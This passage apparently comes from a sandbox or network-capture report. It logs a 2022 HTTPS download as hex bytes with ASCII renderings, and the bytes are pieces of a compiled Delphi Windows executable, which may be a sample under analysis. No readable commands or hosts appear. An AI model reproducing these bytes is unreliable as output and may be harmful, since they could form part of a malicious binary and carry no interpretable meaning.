                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16623INData Raw: 94 d4 ff ff eb 15 e8 d9 d2 ff ff eb 0e 8b c8 b8 04 00 00 00 d3 e0 e8 45 00 00 00 ff 03 83 3b 00 7d 06 c7 03 0a 00 00 00 5e 5b c3 90 53 51 8b d8 33 c0 89 04 24 8b 13 85 d2 75 0f 8b c2 b9 01 00 00 00 f0 0f b1 0b 3b d0 74 09 8b c4 e8 63 ff ff ff eb e2 5a 5b c3 8b c0 33 d2 f0 87 10 c3 8b c0 83 f8 00 7e 08 f3 90 48 83 f8 00 7f f8 c3 8b c0 55 8b ec 83 c4 f4 33 c0 89 45 f4 68 e8 64 40 00 68 08 65 40 00 e8 b2 d2 ff ff 50 e8 b4 d2 ff ff 85 c0 0f 84 8d 00 00 00 8d 45 f4 50 6a 00 e8 b1 d3 ff ff 85 c0 75 7e e8 68 d2 ff ff 83 f8 7a 75 74 8b 45 f4 e8 83 ef ff ff 89 45 f8 33 d2 55 68 d2 64 40 00 64 ff 32 64 89 22 8d 45 f4 50 8b 45 f8 50 e8 7d d3 ff ff 8b 45 f8 83 7d f4 00 76 28 66 83 78 04 02 75 14 80 78 08 01 75 0e 0f b7 40 0a 89 45 fc e8 63 0d 00 00 eb 31 83 c0 18 83
                                                                                                                                                                                                                                    Data Ascii: E;}^[SQ3$u;tcZ[3~HU3Ehd@he@PEPju~hzutEE3Uhd@d2d"EPEP}E}v(fxuxu@Ec1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16625INData Raw: 56 51 8b 10 83 c2 cc 8b 32 03 f0 83 ee 04 8b 06 89 04 24 8b 1c 24 83 e3 fe 85 db 75 30 e8 0d fc ff ff 8b d0 8b 0c 24 83 e1 01 0b ca 8b 04 24 f0 0f b1 0e 8b 06 89 04 24 8b 1c 24 83 e3 fe 85 db 74 e2 3b d3 74 07 8b c2 e8 12 d9 ff ff 8b c3 5a 5e 5b c3 53 e8 a2 fc ff ff 85 c0 74 10 8b 40 08 8b 1d f8 b8 4b 00 33 c9 33 d2 ff 53 10 5b c3 53 8b d8 83 3d f8 b8 4b 00 00 75 07 b0 1a e8 bd eb ff ff 8b c3 e8 76 ff ff ff e8 c5 ff ff ff 5b c3 8d 40 00 53 56 8b f0 8b c6 e8 5d fc ff ff 8b d8 85 db 74 1d 8b 43 08 8b 1d f8 b8 4b 00 33 c9 33 d2 ff 53 10 8b c6 e8 40 fc ff ff 8b d8 85 db 75 e3 5e 5b c3 8d 40 00 53 8b d8 83 3d f8 b8 4b 00 00 75 07 b0 1a e8 65 eb ff ff 8b c3 e8 1e ff ff ff e8 ad ff ff ff 5b c3 8d 40 00 55 8b ec 51 53 8b da 89 45 fc 8b 45 fc 83 c0 18 e8 d3 f9 ff
                                                                                                                                                                                                                                    Data Ascii: VQ2$$u0$$$$t;tZ^[St@K33S[S=Kuv[@SV]tCK33S@u^[@S=Kue[@UQSEE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16626INData Raw: 5d 00 00 ff b0 00 00 00 00 89 a0 00 00 00 00 8b 6f 08 8b 5f 04 c7 47 04 8c 6e 40 00 83 c3 05 e8 66 fe ff ff ff e3 e9 53 02 00 00 e8 ca 5d 00 00 8b 88 00 00 00 00 8b 11 89 90 00 00 00 00 8b 41 08 e9 3c ee ff ff b8 01 00 00 00 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 6f 01 00 00 81 38 de fa ed 0e 74 1f fc e8 f9 ec ff ff 8b 15 14 b0 4b 00 85 d2 0f 84 53 01 00 00 ff d2 85 c0 75 0a e9 48 01 00 00 8b 40 18 8b 00 8b 54 24 08 53 56 57 55 8b 4a 04 8b 59 05 8d 71 09 89 c5 8b 06 85 c0 74 43 89 ef eb 02 8b 3f 8b 00 39 f8 74 37 8b 48 cc 3b 4f cc 75 17 8b 40 c8 8b 57 c8 31 c9 8a 08 3a 0a 75 09 40 42 e8 09 11 00 00 74 18 8b 7f d0 8b 06 85 ff 75 d0 83 c6 08 4b 75 c0 5d 5f 5e 5b e9 e7 00 00 00 8b 44 24 14 81 38 de fa ed 0e 8b 50 18 8b 48 14 74 41 ff 15 18 b0 4b 00
                                                                                                                                                                                                                                    Data Ascii: ]o_Gn@fS]A<D$@o8tKSuH@T$SVWUJYqtC?9t7H;Ou@W1:u@BtuKu]_^[D$8PHtAK
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16627INData Raw: 8b 1d a4 db 4b 00 8b 78 04 33 c0 55 68 fe 73 40 00 64 ff 30 64 89 20 85 db 7e 1a 4b 89 1d a4 db 4b 00 8b 74 df 04 85 f6 74 07 83 3e 00 74 02 ff d6 85 db 7f e6 33 c0 5a 59 59 64 89 10 eb 14 e9 85 f9 ff ff e8 a8 ff ff ff e8 7f fd ff ff e8 ce fd ff ff 5f 5e 5b 5d c3 90 55 8b ec 51 53 56 57 a1 a0 db 4b 00 85 c0 74 56 8b 38 33 db 8b 40 04 89 45 fc 33 c0 55 68 6a 74 40 00 64 ff 30 64 89 20 3b fb 7e 1c 8b 45 fc 8b 34 d8 43 89 1d a4 db 4b 00 85 f6 74 07 83 3e 00 74 02 ff d6 3b fb 7f e4 33 c0 5a 59 59 64 89 10 eb 14 e9 19 f9 ff ff e8 3c ff ff ff e8 13 fd ff ff e8 62 fd ff ff 5f 5e 5b 59 5d c3 c7 05 1c b0 4b 00 b0 36 40 00 c7 05 20 b0 4b 00 b8 36 40 00 a3 a0 db 4b 00 33 c0 a3 a4 db 4b 00 89 15 a8 db 4b 00 8b 42 04 a3 40 b0 4b 00 b8 98 db 4b 00 e8 ac fe ff ff c6 05
                                                                                                                                                                                                                                    Data Ascii: Kx3Uhs@d0d ~KKtt>t3ZYYd_^[]UQSVWKtV83@E3Uhjt@d0d ;~E4CKt>t;3ZYYd<b_^[Y]K6@ K6@K3KKB@KK
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16629INData Raw: 33 89 7b 04 c6 05 59 b0 4b 00 01 8b 45 08 50 8b 45 0c 50 53 b8 a8 78 40 00 50 8b 45 f8 50 8b 45 fc 50 e8 49 bd ff ff 8b f0 85 f6 75 07 8b c3 e8 c0 da ff ff 8b c6 5f 5e 5b 59 59 5d c2 0c 00 90 53 8b d8 83 3d 38 70 4b 00 00 74 08 8b c3 ff 15 38 70 4b 00 53 e8 2e bd ff ff 5b c3 85 c0 7e 39 50 01 c0 70 2f 83 c0 0e 70 2a e8 69 da ff ff 83 c0 0c 5a c7 40 f8 01 00 00 00 89 50 fc 66 c7 04 50 00 00 66 c7 40 f6 02 00 8b 15 80 b9 4b 00 66 89 50 f4 c3 e9 2f e2 ff ff 31 c0 c3 85 c0 7e 43 50 83 c0 0e 70 38 83 e0 fe 52 50 e8 28 da ff ff 5a 59 66 c7 44 02 fe 00 00 83 c0 0c 5a 89 50 fc c7 40 f8 01 00 00 00 85 c9 75 06 8b 0d 7c b9 4b 00 89 ca 66 89 50 f4 66 c7 40 f6 01 00 c3 e9 e5 e1 ff ff 31 c0 c3 8b c0 b0 01 e9 45 db ff ff c3 85 c0 74 10 50 6a 00 e8 b4 bd ff ff 85 c0 0f
                                                                                                                                                                                                                                    Data Ascii: 3{YKEPEPSx@PEPEPIu_^[YY]S=8pKt8pKS.[~9Pp/p*iZ@PfPf@KfP/1~CPp8RP(ZYfDZP@u|KfPf@1EtPj
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16630INData Raw: 8d 40 00 39 10 74 23 85 d2 0f 84 e8 fb ff ff 8b 4a fc d1 e9 0f 84 dd fb ff ff 51 52 50 e8 3d b9 ff ff 85 c0 0f 84 65 fb ff ff c3 85 d2 74 28 8b 4a f8 41 7f 1e 50 52 8b 42 fc 0f b7 52 f4 e8 00 fb ff ff 89 c2 58 52 8b 48 fc e8 f4 d6 ff ff 5a 58 eb 04 f0 ff 42 f8 87 10 85 d2 74 14 8b 4a f8 49 7c 0e f0 ff 4a f8 75 08 8d 42 f4 e8 2a d5 ff ff c3 90 85 c0 74 05 83 e8 04 8b 00 c3 8b c0 33 d2 85 c0 74 09 eb 01 42 80 3c 10 00 75 f9 8b c2 c3 8b c0 33 d2 85 c0 74 0a eb 01 42 66 83 3c 50 00 75 f8 8b c2 c3 90 8b 10 85 d2 74 38 8b 4a f8 49 74 32 53 89 c3 8b 42 fc e8 45 fa ff ff 89 c2 87 03 50 8b 48 fc d1 e1 e8 76 d6 ff ff 58 8b 48 f8 49 7c 0e f0 ff 48 f8 75 08 8d 40 f4 e8 b9 d4 ff ff 8b 13 5b 89 d0 c3 8d 40 00 8b 10 85 d2 74 3a 8b 4a f8 49 74 34 53 89 c3 8b 42 fc 0f b7
                                                                                                                                                                                                                                    Data Ascii: @9t#JQRP=et(JAPRBRXRHZXBtJI|JuB*t3tB<u3tBf<Put8JIt2SBEPHvXHI|Hu@[@t:JIt4SB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16631INData Raw: 51 85 ff 74 54 8b 46 fc 8b 57 fc 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 41 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 34 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 02 74 0b 66 8b 0e 66 8b 1f 66 39 d9 75 21 01 c0 eb 1d 8b 57 fc 29 d0 eb 16 8b 46 fc 29 d0 eb 0f 5a 66 39 d9 75 09 c1 e9 10 c1 eb 10 66 39 d9 5f 5e 5b c3 8d 40 00 e9 77 ff ff ff c3 8b c0 53 56 57 8b f2 8b f8 33 db 85 f6 7e 2d 8b c6 e8 ac f5 ff ff 8b d8 8b 07 85 c0 74 07 83 e8 04 8b 00 d1 e8 85 c0 7e 13 3b f0 7d 02 8b c6 8b c8 03 c9 8b d3 8b 07 e8 32 d1 ff ff 8b c7 8b d3 e8 59 fe ff ff 5f 5e 5b c3 90 53 56 81 c4 fc fe ff ff 8b d9 66 89 14 24 8b f0 81 fb ff 00 00 00 7e 05 bb ff 00 00 00 6a 01 8d 4c 24 04 8d 44 24 06 ba ff 00 00 00 e8 af f6 ff ff 85 c0 7d 04 33 c0 eb 06
                                                                                                                                                                                                                                    Data Ascii: QtTFW)wRt&9uAJtN_9u4JuZtfff9u!W)F)Zf9uf9_^[@wSVW3~-t~;}2Y_^[SVf$~jL$D$}3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16633INData Raw: 01 c9 01 c8 01 ca f7 d9 53 8b 1c 01 3b 1c 11 75 07 83 c1 04 78 f3 31 c0 5b c3 85 c0 74 04 85 d2 75 d6 39 d0 c3 8d 40 00 55 8b ec 53 56 8b d8 85 db 74 05 83 eb 04 8b 1b 83 fa 01 7d 04 33 d2 eb 07 4a 3b da 7d 02 8b d3 85 c9 7d 04 33 f6 eb 0a 8b f3 2b f2 3b ce 7d 02 8b f1 8b 4d 08 03 d2 03 d0 8b c6 91 e8 bb f2 ff ff 5e 5b 5d c2 04 00 90 53 56 57 8b f9 8b da 8b f0 8b c6 e8 14 f6 ff ff 8b 06 85 c0 74 05 83 e8 04 8b 00 83 fb 01 7c 36 3b c3 7c 32 85 ff 7e 2e 4b 8b d0 2b d3 2b d7 8b fa 85 ff 7d 02 33 ff 2b c7 8b 16 8d 04 42 8b cf 03 c9 8b 16 8d 14 5a e8 74 cc ff ff 8d 14 1f 8b c6 e8 1a fd ff ff 5f 5e 5b c3 8b c0 53 56 57 55 83 c4 f4 8b f1 8b fa 89 04 24 8b 04 24 85 c0 74 05 83 e8 04 8b 00 8b e8 85 ed 0f 8e 8b 00 00 00 8b 07 85 c0 74 05 83 e8 04 8b 00 8b d8 83 fe
                                                                                                                                                                                                                                    Data Ascii: S;ux1[tu9@USVt}3J;}}3+;}M^[]SVWt|6;|2~.K++}3+BZt_^[SVWU$$tt
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16634INData Raw: af fe ff ff 4f 7f f0 5d eb 2b 89 d8 83 c3 04 e8 8b 26 00 00 4f 7f f3 eb 1c 89 d8 89 f2 83 c3 04 e8 22 0f 00 00 4f 7f f1 eb 0b 5f 5e 5b 58 b0 02 e9 3a c7 ff ff 5f 5e 5b 58 c3 90 b9 01 00 00 00 e9 e6 fe ff ff c3 90 31 c9 53 8a 4a 01 56 57 89 c3 8d 74 11 0a 8b 7c 11 06 85 ff 74 1d 8b 16 85 d2 74 17 8b 46 04 01 d8 8b 12 b9 01 00 00 00 e8 23 00 00 00 83 c6 08 4f 7f e3 5f 5e 5b c3 90 83 3d 14 70 4b 00 00 74 07 ff 15 14 70 4b 00 c3 b0 10 e8 d9 c6 ff ff c3 53 56 57 85 c9 0f 84 b4 00 00 00 89 c3 89 d6 89 cf 31 d2 8a 06 8a 56 01 3c 0a 74 26 3c 0b 74 31 3c 12 74 1e 3c 0c 74 38 3c 0d 74 43 3c 0e 74 5d 3c 0f 74 6f 3c 11 74 7a b0 02 5f 5e 5b e9 96 c6 ff ff 8b 03 83 c3 04 e8 54 ec ff ff 4f 7f f3 eb 6e 89 d8 83 c3 04 e8 55 ec ff ff 4f 7f f3 eb 5f 89 d8 83 c3 10 e8 7e ff
                                                                                                                                                                                                                                    Data Ascii: O]+&O"O_^[X:_^[X1SJVWt|ttF#O_^[=pKtpKSVW1V<t&<t1<t<t8<tC<t]<to<tz_^[TOnUO_~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16635INData Raw: c3 90 53 56 57 55 89 c3 89 d6 89 cf 8b 6c 24 14 8a 0f 80 f9 0a 74 3a 80 f9 0b 74 4c 80 f9 12 74 5e 80 f9 0c 74 6d 80 f9 0d 74 7c 80 f9 0e 0f 84 96 00 00 00 80 f9 0f 0f 84 aa 00 00 00 80 f9 11 0f 84 b5 00 00 00 b0 02 5d 5f 5e 5b e9 c5 c1 ff ff 89 d8 8b 16 e8 0c eb ff ff 83 c3 04 83 c6 04 4d 75 ee e9 a7 00 00 00 89 d8 8b 16 e8 cd ea ff ff 83 c3 04 83 c6 04 4d 75 ee e9 90 00 00 00 89 d8 8b 16 e8 42 ea ff ff 83 c3 04 83 c6 04 4d 75 ee eb 7c 89 d8 89 f2 e8 66 fb ff ff 83 c3 10 83 c6 10 4d 75 ee eb 68 31 c9 8a 4f 01 8d 7c 39 02 89 d8 89 f2 8b 4f 08 8b 09 ff 77 04 e8 41 ff ff ff 03 1f 03 37 4d 75 e8 eb 45 89 d8 89 f2 89 f9 e8 51 fb ff ff 31 c0 8a 47 01 03 5c 38 02 03 74 38 02 4d 75 e5 eb 28 89 d8 8b 16 e8 6e 20 00 00 83 c3 04 83 c6 04 4d 75 ee eb 14 89 d8 8b 16
                                                                                                                                                                                                                                    Data Ascii: SVWUl$t:tLt^tmt|]_^[MuMuBMu|fMuh1O|9OwA7MuEQ1G\8t8Mu(n Mu
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16637INData Raw: 0f b6 05 fc db 4b 00 88 04 24 eb 6f 0f b6 03 2c 0d 74 06 fe c8 74 0f eb 5e 0f b6 43 01 03 c3 8b 40 0a 8b 18 eb d2 0f b6 73 01 03 f3 83 7e 06 00 76 45 8b 6e 06 4d 85 ed 7c 3d 45 33 ff 83 7c fe 0a 00 74 37 8b 44 fe 0a 8b 18 80 3b 0d 75 14 0f b6 43 01 03 c3 8b 40 0a 8b 00 e8 8a ff ff ff 84 c0 75 18 80 3b 0e 75 0b 8b c3 e8 7a ff ff ff 84 c0 75 08 47 4d 75 c6 c6 04 24 00 0f b6 04 24 5a 5d 5f 5e 5b c3 53 56 8b f0 e8 43 33 00 00 3b b0 08 00 00 00 75 0e e8 36 33 00 00 0f b6 98 0c 00 00 00 eb 1f 8b c6 e8 3e ff ff ff 8b d8 e8 1f 33 00 00 89 b0 08 00 00 00 e8 14 33 00 00 88 98 0c 00 00 00 8b c3 5e 5b c3 90 55 8b ec 83 c4 dc 53 56 57 89 4d f4 89 55 f8 89 45 fc 8b 45 fc 8b 00 89 45 e0 8b 45 08 8b 18 85 db 7f 1b 85 db 7d 07 b0 04 e8 c6 bb ff ff 8b 45 fc 8b 55 f8 e8 93
                                                                                                                                                                                                                                    Data Ascii: K$o,tt^C@s~vEnM|=E3|t7D;uC@u;uzuGMu$$Z]_^[SVC3;u63>33^[USVWMUEEEE}EU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16638INData Raw: 89 44 24 04 8b c3 83 e8 08 8b 40 04 89 44 24 08 8b 44 24 04 03 44 24 08 89 44 24 0c 8b 04 24 0f b6 78 01 03 f8 8b c7 8b 68 02 8b 50 06 85 d2 74 04 8b 3a eb 02 33 ff 8b 44 24 0c f7 ed 89 44 24 10 8b 44 24 10 99 f7 7c 24 0c 3b e8 74 05 e8 a5 bd ff ff 83 44 24 10 08 83 7c 24 10 00 7d 05 e8 94 bd ff ff 8b 06 89 44 24 18 8b 44 24 0c 89 44 24 14 8d 44 24 14 50 8b c6 b9 01 00 00 00 8b 54 24 04 e8 e9 fa ff ff 3b 5c 24 18 75 02 8b 1e 85 ff 74 1b 8b 44 24 04 f7 ed 8b 16 8d 04 02 8b 54 24 08 52 8b cf 8b d3 e8 e4 f6 ff ff eb 18 8b 44 24 04 f7 ed 8b 16 03 d0 8b 4c 24 08 0f af cd 8b c3 e8 06 b7 ff ff 83 c4 1c 5d 5f 5e 5b c3 8b c0 55 8b ec 83 c4 e4 53 56 57 89 4d f8 89 55 fc 8b d8 83 3b 00 0f 84 cc 00 00 00 8b 03 83 e8 08 8b 40 04 83 7d fc 00 0f 8c ba 00 00 00 3b 45 fc
                                                                                                                                                                                                                                    Data Ascii: D$@D$D$D$D$$xhPt:3D$D$D$|$;tD$|$}D$D$D$D$PT$;\$utD$T$RD$L$]_^[USVWMU;@};E
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16639INData Raw: 10 dc 4b 00 e8 36 93 ff ff c3 90 53 85 d2 75 07 66 c7 00 00 00 eb 26 85 d2 7e 16 0f b7 19 66 89 18 66 85 db 74 17 83 c0 02 83 c1 02 4a 85 d2 7f ea 85 d2 75 08 83 e8 02 66 c7 00 00 00 5b c3 55 8b ec 51 53 89 45 fc 8b 45 fc e8 74 d7 ff ff 33 c0 55 68 dc a3 40 00 64 ff 30 64 89 20 8b 45 fc 85 c0 74 05 83 e8 04 8b 00 83 f8 01 7c 15 8b 55 fc 66 83 7c 42 fe 2d 75 05 8b d8 4b eb 07 48 85 c0 75 eb 33 db 33 c0 5a 59 59 64 89 10 68 e3 a3 40 00 8d 45 fc e8 45 d6 ff ff c3 e9 5b cc ff ff eb f0 8b c3 5b 59 5d c3 8d 40 00 55 8b ec 6a 00 6a 00 6a 00 53 56 8b da 8b f0 33 c0 55 68 af a4 40 00 64 ff 30 64 89 20 8b c3 8b d6 e8 0e e1 ff ff 8b 03 85 c0 74 05 83 e8 04 8b 00 85 c0 7e 13 ba 01 00 00 00 8b 0b 66 83 7c 51 fe 2c 74 64 42 48 75 f2 8d 45 f8 8b 13 e8 0a da ff ff 8b c3
                                                                                                                                                                                                                                    Data Ascii: K6Suf&~fftJuf[UQSEEt3Uh@d0d Et|Uf|B-uKHu33ZYYdh@EE[[Y]@UjjjSV3Uh@d0d t~f|Q,tdBHuE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16641INData Raw: e8 45 de ff ff 68 10 dc 4b 00 e8 c7 8d ff ff 66 89 1d 28 dc 4b 00 8b 06 e8 35 dc ff ff 8b c8 b8 2a dc 4b 00 ba aa 00 00 00 e8 84 fa ff ff 68 10 dc 4b 00 e8 a6 8d ff ff 33 c0 5a 59 59 64 89 10 68 ef a8 40 00 8d 45 fc e8 39 d1 ff ff c3 e9 4f c7 ff ff eb f0 5e 5b 59 5d c3 b0 04 02 00 ff ff ff ff 01 00 00 00 2c 00 00 00 53 56 8b d8 eb 08 53 e8 40 8e ff ff 8b d8 0f b7 33 66 85 f6 74 06 66 83 fe 5c 75 ea 8b c3 5e 5b c3 8d 40 00 55 8b ec 81 c4 94 fb ff ff 53 56 57 89 55 f8 89 45 fc 8b 45 fc 89 45 f4 68 e8 aa 40 00 e8 a6 8d ff ff 8b f0 85 f6 74 3d 68 04 ab 40 00 56 e8 9d 8d ff ff 89 c3 85 db 74 2c 68 05 01 00 00 8d 85 96 fb ff ff 50 8b 45 fc 50 ff d3 85 c0 74 16 8d 8d 96 fb ff ff 8b 55 f8 8b 45 fc e8 c4 f9 ff ff e9 51 01 00 00 8b 45 fc 66 83 38 5c 75 3b 8b 45 fc
                                                                                                                                                                                                                                    Data Ascii: EhKf(K5*KhK3ZYYdh@E9O^[Y],SVS@3ftf\u^[@USVWUEEEh@t=h@Vt,hPEPtUEQEf8\u;E
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16642INData Raw: 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 42 00 6f 00 72 00 6c 00 61 00 6e 00 64 00 5c 00 44 00 65 00 6c 00 70 00 68 00 69 00 5c 00 4c 00 6f 00 63 00 61 00 6c 00 65 00 73 00 00 00 00 00 00 00 55 8b ec 6a 00 53 56 8b da 8b f0 33 c0 55 68 8b ae 40 00 64 ff 30 64 89 20 83 3d 10 7c 4b 00 00 75 12 8d 55 fc 8b c6 e8 b8 fc ff ff 8b 45 fc e8 30 00 00 00 8b c3 8b 15 10 7c 4b 00 e8 db d6 ff ff 33 c0 5a 59 59 64 89 10 68 92 ae 40 00 8d 45 fc e8 96 cb ff ff c3 e9 ac c1 ff ff eb f0 5e 5b 59 5d c3 90 53 56 57 8b f0 83 3d 10 7c 4b 00 00 74 0a a1 10 7c 4b 00 e8 bc 93 ff ff 8b c6 85 c0 74 05 83 e8 04 8b 00 8b d8 85 db 7e 27 43 8b fb 03 ff 8b c7 e8 1b 90 ff ff a3 10 7c 4b 00 8b c6 e8 13 d6 ff ff 8b 15 10 7c 4b 00 8b cf e8 ce a6 ff ff eb 07 33 c0 a3 10 7c 4b 00 5f 5e 5b
                                                                                                                                                                                                                                    Data Ascii: ftware\Borland\Delphi\LocalesUjSV3Uh@d0d =|KuUE0|K3ZYYdh@E^[Y]SVW=|Kt|Kt~'C|K|K3|K_^[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16643INData Raw: 8b 00 a3 48 70 4b 00 8b c7 e8 b2 a0 ff ff eb 28 8b df 85 db 74 22 8b 33 85 f6 74 16 8b 46 04 3b c5 75 0f 8b fe 8b 06 89 03 8b c7 e8 90 a0 ff ff eb 06 8b 1b 85 db 75 de 5d 5f 5e 5b c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 89 45 fc a1 48 70 4b 00 89 45 f8 83 7d f8 00 74 39 33 c0 55 68 c7 b3 40 00 64 ff 30 64 89 20 8b 5d f8 8b 45 fc ff 53 04 33 c0 5a 59 59 64 89 10 eb 0a e9 bc b9 ff ff e8 0f be ff ff 8b 45 f8 8b 00 89 45 f8 83 7d f8 00 75 c7 5f 5e 5b 59 59 5d c3 8b c0 8b 15 44 70 4b 00 85 d2 74 0a 3b c2 74 13 8b 12 85 d2 75 f6 8b 15 44 70 4b 00 89 10 a3 44 70 4b 00 c3 8b c0 55 8b ec 51 89 45 fc 33 d2 55 68 70 b4 40 00 64 ff 32 64 89 22 8b 45 fc 8b 40 04 e8 60 ff ff ff 33 c0 5a 59 59 64 89 10 68 77 b4 40 00 8b 45 fc 3b 05 44 70 4b 00 75 0c 8b 45 fc 8b 00 a3 44
                                                                                                                                                                                                                                    Data Ascii: HpK(t"3tF;uu]_^[@USVWEHpKE}t93Uh@d0d ]ES3ZYYdEE}u_^[YY]DpKt;tuDpKDpKUQE3Uhp@d2d"E@`3ZYYdhw@E;DpKuED
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16645INData Raw: 46 54 61 67 43 6f 75 6e 74 65 72 0c 00 f8 21 40 00 b8 5c 40 00 00 00 9c 10 40 00 0c 00 00 00 00 0a 46 46 72 65 65 43 6f 75 6e 74 02 00 50 23 40 00 10 00 00 00 00 09 46 49 6e 69 74 4c 6f 63 6b 02 00 24 b8 40 00 14 00 00 00 00 08 46 42 75 63 6b 65 74 73 02 00 00 10 40 00 50 09 00 00 00 0c 46 49 6e 69 74 69 61 6c 69 7a 65 64 02 00 02 00 08 00 08 8c c2 40 00 07 44 65 73 74 72 6f 79 00 00 00 00 00 00 01 00 00 11 40 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 08 dc c1 40 00 0a 49 6e 69 74 69 61 6c 69 7a 65 00 00 00 00 00 00 00 02 00 08 98 c1 40 00 08 46 69 6e 61 6c 69 7a 65 00 00 00 00 00 00 00 02 00 08 38 c3 40 00 0f 52 65 67 69 73 74 65 72 57 65 61 6b 52 65 66 00 00 00 00 00 00 02 00 00 11 40 00 07 41 64 64 72 65 73 73 02 00 00 00 11 40 00 08 49 6e 73 74 61 6e
                                                                                                                                                                                                                                    Data Ascii: FTagCounter!@\@@FFreeCountP#@FInitLock$@FBuckets@PFInitialized@Destroy@Instance@Initialize@Finalize8@RegisterWeakRef@Address@Instan
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16646INData Raw: 05 03 c1 b9 1f 00 00 00 99 f7 f9 8b da 8b 45 fc e8 69 fe ff ff 33 c9 55 68 6b be 40 00 64 ff 31 64 89 21 8b 04 9e 85 c0 74 05 83 e8 04 8b 00 8b d0 4a 85 d2 7c 21 42 33 c0 8b 0c 9e 8b 0c 81 3b 4d f8 75 0f 8b 14 9e 33 c9 89 0c 82 e8 c1 b3 ff ff eb 21 40 4a 75 e2 33 c0 5a 59 59 64 89 10 68 72 be 40 00 8b 45 fc e8 2a fe ff ff c3 e9 cc b1 ff ff eb f0 5e 5b 59 59 5d c3 53 56 57 8b f9 8b f2 8b d8 8b 43 08 85 c0 74 05 83 e8 04 8b 00 85 c0 75 0f 8d 43 08 ba 0a 00 00 00 e8 a6 fc ff ff eb 29 8b 43 08 85 c0 74 05 83 e8 04 8b 00 3b 43 04 75 18 8b 43 08 85 c0 74 05 83 e8 04 8b 00 8b d0 03 d2 8d 43 08 e8 7b fc ff ff 8b 43 04 3b f0 7c 08 8b 53 08 89 3c 82 eb 1f 8b 53 08 8d 54 b2 04 8b 4b 08 8d 0c b1 2b c6 03 c0 03 c0 91 e8 c3 96 ff ff 8b 43 08 89 3c b0 ff 43 04 5f 5e 5b
                                                                                                                                                                                                                                    Data Ascii: Ei3Uhk@d1d!tJ|!B3;Mu3!@Ju3ZYYdhr@E*^[YY]SVWCtuC)Ct;CuCtC{C;|S<STK+C<C_^[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16647INData Raw: e8 80 fe ff ff 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 44 b0 14 e8 37 fc ff ff 33 d2 55 68 ed c3 40 00 64 ff 32 64 89 22 8b 45 fc 8d 44 b0 14 8d 4d f0 8b d3 e8 5c fb ff ff 89 45 ec 83 7d ec 00 75 20 8b 45 fc 8b d3 e8 2d fd ff ff 8b d8 8b 45 fc 8d 44 b0 14 8b cb 8b 55 f0 e8 ae fa ff ff 89 5d ec 33 c0 5a 59 59 64 89 10 68 f4 c3 40 00 8b 45 f4 8d 04 40 8b 55 fc 8d 44 82 14 e8 38 fc ff ff c3 e9 4a ac ff ff eb e6 8b 45 ec 89 45 e8 8b 45 e8 8d 50 08 8b 45 e8 8b 4d f8 e8 0d f9 ff ff 5e 5b 8b e5 5d c3 8d 40 00 55 8b ec 83 c4 e8 53 56 8b d9 89 55 f8 89 45 fc 8b 45 fc 80 b8 50 09 00 00 00 0f 84 8f 00 00 00 8b cb 8b c1 c1 e8 0d c1 e9 05 03 c1 b9 c5 00 00 00 99 f7 f9 89 55 f4 8b 75 f4 8d 34 76 8b 45 fc 8d 44
                                                                                                                                                                                                                                    Data Ascii: Uu4vED73Uh@d2d"EDM\E}u E-EDU]3ZYYdh@E@UD8JEEEPEM^[]@USVUEEPUu4vED
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16649INData Raw: 05 83 eb 04 8b 1b 53 8b c6 e8 2e bc ff ff 8b c8 8d 47 01 ba ff 00 00 00 e8 cb fd ff ff 48 85 c0 7d 02 33 c0 88 07 5f 5e 5b c3 8b c0 55 8b ec 81 c4 fc fe ff ff 53 56 57 33 c9 89 4d fc 8b f0 8d bd fc fe ff ff 0f b6 0e 41 f3 a4 8b f2 33 c0 55 68 7e c9 40 00 64 ff 30 64 89 20 8b c6 e8 0e b1 ff ff 80 bd fc fe ff ff 00 74 4d 0f b6 9d fc fe ff ff 8d 45 fc 8b d3 e8 38 bd ff ff 53 8b 45 fc e8 b7 bb ff ff 8d 8d fd fe ff ff 8d 53 01 e8 f5 fd ff ff 8b d8 85 db 7e 0d 8b d3 4a 8d 45 fc e8 10 bd ff ff eb 08 8d 45 fc e8 c2 b0 ff ff 8b c6 8b 55 fc e8 98 b4 ff ff 33 c0 5a 59 59 64 89 10 68 85 c9 40 00 8d 45 fc e8 a3 b0 ff ff c3 e9 b9 a6 ff ff eb f0 5f 5e 5b 8b e5 5d c3 53 56 57 81 c4 00 ff ff ff 8b f0 8d 3c 24 0f b6 0e 41 f3 a4 8b da 8b d3 8b c4 e8 31 ff ff ff 81 c4 00 01
                                                                                                                                                                                                                                    Data Ascii: S.GH}3_^[USVW3MA3Uh~@d0d tME8SES~JEEU3ZYYdh@E_^[]SVW<$A1
